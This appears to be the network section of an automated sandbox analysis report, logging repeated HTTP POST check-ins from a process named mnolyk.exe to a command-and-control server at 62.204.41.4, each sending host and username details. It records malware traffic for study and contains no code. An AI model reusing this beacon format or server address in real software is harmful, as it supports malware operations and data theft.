Feb 7, 2023 20:04:01.334892035 CET	839	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:01.399890900 CET	839	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
685	192.168.2.6	50410	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:01.580414057 CET	840	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:01.644088030 CET	840	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
686	192.168.2.6	50411	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:01.821830034 CET	841	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:01.885998964 CET	841	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
687	192.168.2.6	50412	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:02.064924955 CET	842	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:02.131974936 CET	842	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
688	192.168.2.6	50413	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:02.323272943 CET	843	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:02.387392998 CET	843	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
689	192.168.2.6	50414	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:02.595462084 CET	844	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:02.658051968 CET	844	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
69	192.168.2.6	49789	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:10.000648975 CET	189	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:10.064567089 CET	189	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
690	192.168.2.6	50415	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:02.837203026 CET	845	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:02.900954962 CET	845	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
691	192.168.2.6	50416	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:03.085072994 CET	846	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:03.150670052 CET	846	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
692	192.168.2.6	50417	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:03.329320908 CET	847	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:03.391789913 CET	847	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
693	192.168.2.6	50418	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:03.565176010 CET	848	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:03.629466057 CET	848	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
694	192.168.2.6	50419	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:03.800340891 CET	849	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:03.865376949 CET	849	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
695	192.168.2.6	50420	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:04.035367012 CET	850	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:04.100559950 CET	850	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
696	192.168.2.6	50421	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:04.274056911 CET	851	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:04.338717937 CET	851	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
697	192.168.2.6	50422	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:04.527765036 CET	852	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:04.591325045 CET	852	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
698	192.168.2.6	50423	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:04.774413109 CET	853	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:04.839099884 CET	853	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
699	192.168.2.6	50424	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:05.016891003 CET	854	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:05.080219030 CET	854	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.6	49725	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:00:52.567466974 CET	112	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:00:52.634872913 CET	112	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:00:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
70	192.168.2.6	49790	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:01:10.237145901 CET	190	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:01:10.300898075 CET	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:01:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
700	192.168.2.6	50425	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:05.253500938 CET	855	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:05.317790985 CET	855	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
701	192.168.2.6	50426	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:05.502600908 CET	856	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
Feb 7, 2023 20:04:05.567068100 CET	856	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Tue, 07 Feb 2023 19:04:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 6<c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
702	192.168.2.6	50427	62.204.41.4	80	C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe

Timestamp	kBytes transferred	Direction	Data
Feb 7, 2023 20:04:05.737323999 CET	857	OUT	POST /Gol478Ns/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 62.204.41.4 Content-Length: 90 Cache-Control: no-cache Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 32 34 37 35 32 35 26 75 6e 3d 65 6e 67 69 6e 65 65 72 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31 Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=247525&un=user&dm=&av=13&lv=0&og=1
